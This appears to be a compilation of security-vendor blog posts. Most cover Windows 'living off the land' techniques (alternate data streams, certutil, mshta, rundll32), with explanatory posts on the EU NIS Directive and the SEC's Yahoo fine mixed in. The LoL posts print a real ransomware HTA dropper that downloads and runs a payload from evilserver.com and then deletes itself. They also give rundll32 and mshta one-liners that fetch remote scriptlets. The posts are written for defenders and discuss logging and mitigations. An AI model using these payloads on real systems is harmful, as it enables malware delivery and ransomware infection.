This leads to a favorite topic of the IOS blog: security software that doesn’t have visibility into the underlying file systems structures can be easily tricked by hackers. Oh wait, there just happens to be a solution that looks under the file system hood and so won’t be taken in by these LoL techniques.

Let’s get back to the actual execution of the evil malware embedded in the ADS. There are a few ways to accomplish this. You can embed JavaScript, as I did last time, and then execute the ADS using wscript, the Windows-based app that runs scripting engine.

For kicks, I tried cscript, which is the command-line version, and you can gaze on the GIF I created of my hacking session:

You are getting sleepy as you watch this GIF showing JavaScript malware launched from the ADS. Sleepy.

Can you embed an HTA file and launch the malware with mshta? Affirmative.

And PowerShell works fine as well. Oddvar Moe also has a great post enumerating different ways to launch executables from the ADS. Thanks (again) Oddvar!

Back to the Event Logs

I confess to being a little reluctant to turn on more granular event auditing on my Virtual Box environment – it’s already a sluggish thing as it is.

I threw caution to the wind, and enabled the command line auditing setting, which can be found buried in the GPO console under \Computer Configuration\Administrative Templates\System\Audit Process Creation. Now, I’ll be able to see command line arguments for every process that’s launched. And having previously enabled PowerShell command logging, I’ll be faced with an embarrassment of logging riches.

To its credit, Windows logs very detailed information — for example, the ADS I referenced when I launched my aforementioned evil JavaScript:

Got you! With command line auditing, the reference to the JavaScript hidden in the ADS is now visible for all to see in log.

There’s also a log entry displaying the actual PowerShell code (launched by the JavaScript) — in my scenario, it pulls down a remote PowerShell script and then executes it:

Hmmm, a PowerShell session that downloads and executes a remote script. Wonder if it’s connected with JavaScript in the ADS file?

Even with all this extra information in the log, it’s still not necessarily an easy task — there are tools to help, of course — to correlate these two separate events, the cscript and the PowerShell session, and then determine that there’s abnormal activities taking place.

One More Thing: Rundll32 and Command Line JavasScript

If you don’t enable Windows granular command line tracking and PowerShell auditing for performance reasons, then data security monitoring and incident detection becomes almost impossible when faced with  malware-free techniques used by hackers. To add to the security conundrum, hackers have even more tricks up their virtual sleeves to make life difficult for IT security groups.

Some Lol-ware that accepts a local script file or remote URL reference — for example, mshta — also allows raw JavaScript (or VBScript) to be passed into the command line!

I’ve not mentioned rundll32 before, but it’s a LoL binary that has this direct JavaScript capability. The following bit of script using rundll32 does as advertised — launching a PowerShell session that then writes a little “Boo” message. In real world hacking, this message would be replaced with the first step in the attack.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");

Infosec analysts who are searching through raw Windows logs on a server in which granular auditing has been disabled will have a difficult time working out a connection between a rundll32 process event and a subsequent PowerShell event. Unless they’ve read this post!

There’s still more.

Remember scriplets, those bits of JavaScript that can be treated like COM objects?

So … here’s a great one-liner that uses GetObject to pull in a remote scriptlet and then execute it locally. You just need a small bit of JavaScript (or VBScript) to call the GetObject method. Both rundll32 and mshta can accept the script directly. And the mshta version using VBScript to call GetObject is as follows:

mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))

Basta!

I think we’ve covered enough ground in this post. At the end of day, I’m presenting different ways hackers can inflict pain on a beleaguered IT security group. If you’re looking for homework till next time, you can ponder these last two scripts, and study this Stack Overflow article explaining how rundll32 does its magic. We’ll take another look at rundll32, and I’ll chat about some ways to protect against this hacker voodoo.

 

 

 

 

 

 

Continue reading the next post in "Living off the Land With Microsoft"

EU NIS Directive (NISD) Holds Surprises for US Online Companies

EU NIS Directive (NISD) Holds Surprises for US Online Companies

Last month, a major data security law went into effect that will impact businesses both in the EU and the US. No, I’m not talking about the General Data Protection Regulation (GDPR), which we’ve mentioned more than a few times on the IOS blog. While more narrowly focused on EU “critical infrastructure”, the NIS Directive or NISD also has some surprising implications for non-EU companies not remotely in the business of running hydroelectric plants or other critical or essential services.

It’s a Directive!

A key point to keep in mind is that this new law is a directive. We know from the pre-GDPR Data Privacy Directive (or DPD) that, in the language of EU bureaucrats, a directive is an outline or template for a law.  Individual EU countries will have to fill in the details when they “transpose” it into local laws.

NISD merely says the certain companies that perform “essential services” — EU-speak for critical infrastructure — must take “appropriate technical and organizational measures” against cyber attacks and then notify authorities “without undue delay” when there’s a significant security incident.

That is all she wrote!

Because NISD is not in any way prescriptive, there’s a lot of wiggle room for legislators to fill in the details. Yes, this does mean that, like the older DPD privacy law, NISD will vary signficanlty by country – with some national regulators being far stricter with fines and enforcement

A few countries have already implemented NISD — for example, the UK has localized its version – but most are still hammering out the details. As it turns out, the laggards have a little more time to work out their individual laws. NISD says that EU countries really have until November 2018 to identify specific operators of essential services.

That’s right! Unlike the GDPR, the NISD (for the most part) will apply to an explicit set of companies in the essential services sector, which include energy, transportation, health, financial and banking.

As I write this, I am not aware of any EU country that has produced this list. In effect, NISD is on pause until we hear more from local governments on the essential service picks.

US Digital Service Providers Are Under NISD

However, NISD carves out an exception for digital service providers. EU countries do not have to come up with a list of companies that offer essential online infrastructure. According to NISD, any company offering cloud computing, online marketplaces connecting buyers with sellers, or search engine services are automaticall digital providers!

And they would fall under NISD rules right now. (FYI: Micro and small digital providers that have under 50 employees and less than €10 million revenue are excluded.)

US companies in the cloud and online marketplace space — and there are many — will certainly have to up their game for their EU locations.

But there’s another catch.

Remember how the GDPR applies to companies outside the EU even if they don’t have a physical presence there?

Like the GDPR, NISD also has an expanded territorial scope aspect. If a US company has, say, an online marketplace for apartment vacation rentals and promotes that service in the UK or France, then it would fall under NISD. You can read more about the international territorial scope of NISD in this legal article.

Reporting a NISD Cyber Attack

NISD lists a few parameters to help digital service providers decide whether a cyber attack has had a “substantial impact” on its operations. They include the number of subscribers affected, duration, geographical scope, and economic costs.

The fine print from NISD for reporting a cyber incident affecting a digital service provider.

For example, a ransomware, DDoS, or other disruptive cyber-attack impacting a US online service company offering, say, apartment or car sharing, web hosting, or, cough, search engines in the EU market, regardless of whether they have physical EU servers, are covered by NISD. And they would have to report the incident to the local regulator, know in NISD as a Computer Security Incident Response Team or CSIRT.

There will be fines for noncompliance!

As a baseline, the UK’s implementation of NISD has set maximum fines of  €17 million. Mileage can vary, of course, as each EU country is free to set their own fines and penalties.

In any case, US digital providers now have another EU law to take into account. In short, not only do they have to comply with the GDPR’s security and privacy rules for personal data, but also NISD’s more general requirements for securing IT and networking infrastructure against disruption.

 

 

 

 

 

 

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate ...

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams

We don’t like to think that the core Window binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsrv32 and mshta (LoL-ware) are the equivalent in the non-virtual world of garden tools and stepladders left near the kitchen window. Sure these tools are useful for work around the yard, but unfortunately they can also be exploited by the bad guys.

For example HTML Application or HTA, which I wrote about last time.  At one point, it was a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps (without all the browser chrome). That was back in the early ‘aughts.

Microsoft no longer supports HTA, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn – the Windows\System32 folder.

And hackers have only been too eager to take advantage of it. To make the matters worse, on far too many Windows installations, the .hta file extension is still associated with mshta. A phishmail victim who receives an .hta file attachments,  will automatically launch the app if she clicks on it.

Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks — see, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file using mshta, and you can see the results below:

Still crazy after all these years: mshta .and .hta

It worked fine.

In a hacking scenario where the attacker is already on the victim’s computer, she could download the next phase using say curl, wget, or PowerShell’s DownloadString, and then run the embedded JavaScript with mshta.

But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land using existing Windows binaries is to hide activities.

Certutil and Curl-free Remote Downloading

This leads to certutil, which is yet another Windows binary that serves dual purposes. Its function is to dump, display, and configure certification authority (CA) information. You can read more about it here.

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

It’s a certification tool. No, it’s a stealthy way to download malware. Certutil is both!

This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl.

As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

Hiding Executables With Alternate Data Streams (ADS)

Can the attackers get even stealthier? Unfortunately, yes!

The amazingly clever Oddvar Moe has a great post on Alternate Data Streams, and how it can be used to hide malware scripts and executables in a file.

ADS was Microsoft’s answer to supporting compatibility with Apple McIntosh’s file system. In the Mac word, files have a lot of metadata in addition to regular data associated with them. To make it possible to store this metadata in Windows, Microsoft created ADS.

For example, I can do something like this:

Omg , I directed text into a file and the file size didn’t change! Where did it go? It’s in ADS. #stealthy

On a first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.

Take a closer look at the above screenshot, and notice the “:evil.ps1” that’s tacked on. And then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!

What happened to the text I directed into the file? It’s hidden in the ADS part of the Windows file system. It turns out that I can directly run scripts and binaries that are secretly held in the ADS part of the file system.

And One More Thing

We’ll take a deeper dive into ADS next time. The larger point is the high-level of stealthiness one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on github.

For example, there is a class of Windows binaries — for example, esentutil, extrac32, and others — that acts as a file copy tool. In other words, the attackers don’t have to necessarily reveal themselves by using the obvious Windows “copy” command.

So security detection software that’s based on scanning the Windows Event log looking for the usual Windows file commands will miss sneaky LoL-based hacker file activity.

The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.

Does the Lol-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Lean more!

 

 

 

Continue reading the next post in "Living off the Land With Microsoft"

What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With ...

What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With Yahoo Fine

The Securities and Exchange Commission (SEC) warned companies back in 2011 that cyber incidents can be costly (lost revenue, litigation, reputational damage), and therefore may need to be reported to investors. Sure, there’s no specific legal requirements to tell investors about cybersecurity incidents, but public companies are required by the SEC to inform investors in their filings if there’s any news that may impact their investment decisions.

Actual cyber incidents or even potential security weaknesses can be, in legal speak, “material” information that would have to be reported to the SEC immediately in 8-Ks, or in quarterly 10-Qs, and annual 10-K forms. You can read more about what material means in our post on the SEC’s latest guidelines for cyber reporting.

And then along came Yahoo and its massive breach, which occurred way back in 2014, and wasn’t publically reported until 2016. To refresh memories, after more than a two year delay, Yahoo initially said that a mere 1 billion accounts had been stolen, but then later adjusted that number to 3 billion.

This disclosure of this massive breach came out after Verizon had announced its acquisition of Yahoo. This new information ultimately led Verizon to reduce its bid for Yahoo by about $350 million.

If there were ever a test case for the SEC to show that it was serious about enforcing the reporting of material cyber incidents, this would be it.

The SEC Has Spoken

In late April, the SEC announced a settlement with Yahoo, now known as Altaba, in which it agreed to pay a fine of $35 million. I’ve excerpted part of the actual settlement below, because it should be required reading for CSOs, CISOs, CPOs, as well as CFOs and CLOs (but they usually read this kind of thing with their breakfasts):

Despite its knowledge of the 2014 data breach, Yahoo did not disclose the data breach in its public filings for nearly two years. To the contrary, Yahoo’s risk factor disclosures in its annual and quarterly reports from 2014 through 2016 were materially misleading in that they claimed the company only faced the risk of potential future data breaches that might expose the company to loss of its users’ personal information stored in its information systems … without disclosing that a massive data breach had in fact already occurred.

Ouch!

This SEC action comes on top of a seperate $80 million settlement for a class-action suit brought by investors related to the data breach. There are other law suits pending, and you can read about the whole Yahoo legal mess here.

What Should Yahoo Have Done When it Discovered the Breach?

In December 2015, after Yahoo’s CISO learned that highly sensitive information from well over 100 million users had been hacked, including usernames, email addresses, hashed passwords, and telephone numbers, upper management, including the legal team was informed.

The SEC noted that then “senior management and relevant legal staff did not properly assess the scope, business impact, or legal implications of the breach, including how and where the breach should have been disclosed in Yahoo’s public filing …”

And the SEC pointed out that upper management didn’t disclose the breach to Yahoo’s auditors or outside counsel to get their advice.

Yeah, they should have filed an 8-K immediately.

More specifically SEC called out Yahoo for not maintaining “disclosure controls and procedures” for reporting and analyzing and assessing both actual security incidents or potential security weaknesses.

In plain speak, companies are supposed to have agreed upon procedures to get cyber security information to management, and higher management needs to have rules in place to guide them on analyzing and disclosing a breach or potential data security risk.

Let’s Go to the SEC Files

To get a sense of  how a company reports its cybersecurity status when it wants to say there’s nothing unusual going on, I found a plain, garden-variety example after reviewing some 10-K annual reports on the SEC’s site (and gulping down a few coffees):

Boilerplate risk assessment: when infosec is going well, this is what you report.

You usually can find this kind information in the risk section of the report. In short: this company has the usual standard cyber risk profile, and in their case, there is currently no serious cyber incidents impacting them.

Good enough.

Then I looked at Yahoo’s annual report from 2016 when they discussed, what they refer to as, “the security incident” for the first time.

What you say when you have a “security incident”.

Obviously, this information should have been reported much earlier, but note that Yahoo discusses the PII that was exposed along with the extent of the exposure – at least 500 million accounts—and the status of their current investigation.

CFO Learns Programming

In the next post, I’ll provide more details and some advice about what public companies need to be doing to meet the SEC’s data security reporting guidelines. However, it’s clear from reading their latest guidance from earlier this year – and I’m saying that as a blogger, not as a compliance attorney – that C-Levels will be forced to learn basic computer and data security knowledge.

To make the SEC (and investors) happy, public companies should go beyond having breach disclosure procedures in place. At some point, the raw intelligence will need to be examined by well-informed decision makers at the top. As the SEC guidance points out, companies should “evaluate the significance associated with such [cyber] risks and incidents.”

In other words, the CEO, CFO, and the legal team will need to acquire the appropriate technical background to understand what it means when, say, an assessment report says that your customers credit card directory has an “Everyone” ACL, or that a hashed password file was stolen but can be easily cracked.

I’m not saying your CFO should take Computer Science 101 and understand what hashing means — thought it’s not a bad idea! — but the C-suite should have the technical and infosec context so they can make the right evaluation!

More C-suite infosec wisdom next time.

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomw...

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware

The LoL approach to hacking is a lot like the “travel light” philosophy for tourists. Don’t bring anything to your destination that you can’t find or inexpensively purchase once you’re there. The idea is to live like a native. So hackers don’t have to pack any extra software in their payload baggage to transfer external files: it’s already on the victim’s computer with regsrv32.

As I pointed out last time, there’s the added benefit that regsvr32 allows hackers to stealthily execute JavaScript and VBScript without being detected by AppLocker.

The victim clicks on a phishing email attachment or downloads and opens a file from the hacker’s website, and then a single command line of regsvr32 can run a script (technically, through Windows Script Host), which perform the initial setup of what is typically a multi-step attack. No malware binaries involved since it’s all done “legally” through resident software.

It’s slick, low-profile hacking.

Some Mitigations For Regsvr32 Attacks

In terms of defending against LoL-ware, the major stumbling block is that these leveraged Windows tools also have legitimate uses. You can’t simply eliminate regsrv32.

One approach to reducing the risks of LoL-ware is through whitelisting techniques available through AppLocker. When was the last time you as an ordinary user needed regsrv32? I manage to go through my blogging day without having to register DLLs.

The larger point, of course, is most Lol-ware is meant for sys admins. Back when I was first writing about PowerShell as an attack tool, I described how to use AppLocker to limit who can work with PowerShell. A pure whitelist approach is difficult to pull off, so I just used AppLockers default rules and made some exceptions — only allowing power users access to PowerShell.

I can do something similar with LoL-ware binaries, and you can see the results below when I try to run regsrv32 as ordinary user bob.

Take that hacker! I blocked you with AppLocker.

Another less drastic mitigation is simply to turn off  Internet access for regsrv32. In other words, preventing it from running remote scriptlets living on the hackers’ own servers.

This can be accomplished through Windows Firewall, which I found under the Administrative tools section of my Windows 7 environment. The Firewall console lets you tune network access on an application basis. In my case I turned off outbound access of regsrv32 to both public networks (the Internet) as well internally within the domain. Regsrvr32 still works for normally for dll registration, but I’ve effectively disabled /i option’s secret feature to pull scripts from the Intertoobz.

Did you know that Windows Firewall gives you granular control over individual apps? You do now!

By the way, this seems to be the approach taken by Amazon Web Services, and I suspect other cloud providers as well. When I recently tried the regsvr32 /i hack on an AWS instance, it failed. It took me awhile to realize it was being blocked by the default Firewall rules that seem to now be standard for AWS.

Kudos to Amazon for keeping up with LoL-ware mitigations.

And Along Came HTA

A long time ago, on a distant operating system (XP), Microsoft introduced this idea call HTML Applications or HTA. The idea was to let developers create web applications for Internet Explorer (IE) without “enforcing the strict security model and user interface of the browser.” They even got a patent for it back in 2003.

They discontinued this awesome idea and stopped supporting it in later versions of IE, but the underlying engine that does the real work, mshta.exe, can be still be founder under \Windows\System32.

Of course, during the time when HTA was available, hackers realized they could get IE to launch scripts without the standard browser security checking for, cough, ActiveX objects. And that meant they could obtain shell sessions and run malicious code.

Here’s an old article, circa 2003, describing this technique.

Since current IE browsers no longer support HTA, adaptable hackers found another way to deliver the HTA code to users. They sent it as an email attachment — duh! — with an .hta extension. And tricked the victims to click on the file.

Wait, can that work?

Yes! As I mentioned, the legacy mshta.exe is still there to, presumably, to support old HTA apps that were written by over-eager developers. And on far too many sites, the file type .hta is — agonizing sigh — associated by default with mshta.

All too often, .hta is still associated with mshta. #humans!

In other words, by clicking on a file with an .hta suffix, the victim of a phishing email launches mshta and runs the script embedded in the HTML.

What does the HTA file look like? Here’s a sample script taken from a real-world ransomware attack.

<HTML>
<HEAD>

<script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>

</BODY>
</HTML>

Similar to the COM scriptlets I wrote about, the HTA file acts as a container for a few lines of JavaScript. The goal is to launch a PowerShell session that downloads and directly execute the code containing the next phase of the attack.

Mshta Meets Locky

Unfortunately, many IT groups aren’t aware that native Windows binaries, such as regsrv32, mshta, and more, can be used against them.

A good example of this is a hackers sending phishing emails with attached HTA files and ultimately getting victims to self-install ransomware. The success of Locky ransomware and its variants is actually based on simple and crudely designed social attacks (below).

Yeah, this cleverly written phish mail tricked many people to click on an HTA file and launch a ransomware attack.

Another effective ploy was emailing corporate victims and asking them to download a Chrome browser update from the hacker’s website. In fact, the HTA code above was taken from a file called chrome_patch.hta used in a real-world ransomware attack.

The social engineering in either of these approaches is just clever enough to fool an average employee who hasn’t received any special security training. Or perhaps an executive who’s a little too busy and susceptible to clicking on a phish mail attachment referring to, say, a FedEx invoice

For kicks, I took some of the HTA above, tweaked it so it would download my PowerShell “boo” message, and then used a JavaScript obfuscator to make it even stealthier and less likely to be detected by malware scanners. I also added a .pdf suffix before the .hta, to trick the unwary user:

Obfuscated JavScript embedded in HMTL via way of HTA. #sneaky

When I clicked on the HTA file, I was presented with a security dialog —  thank you, Microsoft for this tip-off — asking whether I wanted to “run” what is supposed to be a document.

What happens when you click on an HTA file? You get a warning from Microsoft, but many people clicked on “Run” anyway.

All too many users became victims of Locky since they went ahead  and clicked on what was a security warning. Humans like to click!

Mshta Mitigations

Ransomware attacks in the last two years that were based on HTA could have been easily stopped with a few simple configurations. As we saw above for regsrv32, closing internet connectivity for mshta through the Windows Firewall or blocking it for average users using AppLocker are both good defensive measures.

Even simpler is to change the .hta file type association from mshta to something more benign – like launching notepad!  By the way, that’s a very common approach, and the user should have some questions when she sees the file is not an invoice. At least, we hope so.

In the next post, we’ll look at a few more binaries that allow you to run scripts. And then we’ll review other LoL-ware that lets you mask common file activities.

I hope you’re seeing that the main point of LoL hackcraft is to make it appear to observers in the IT security room that the hacker is just another user running standard Windows utilities. And also that to reduce the damage of these attacks, you’ll need better secondary defenses!

Continue reading the next post in "Living off the Land With Microsoft"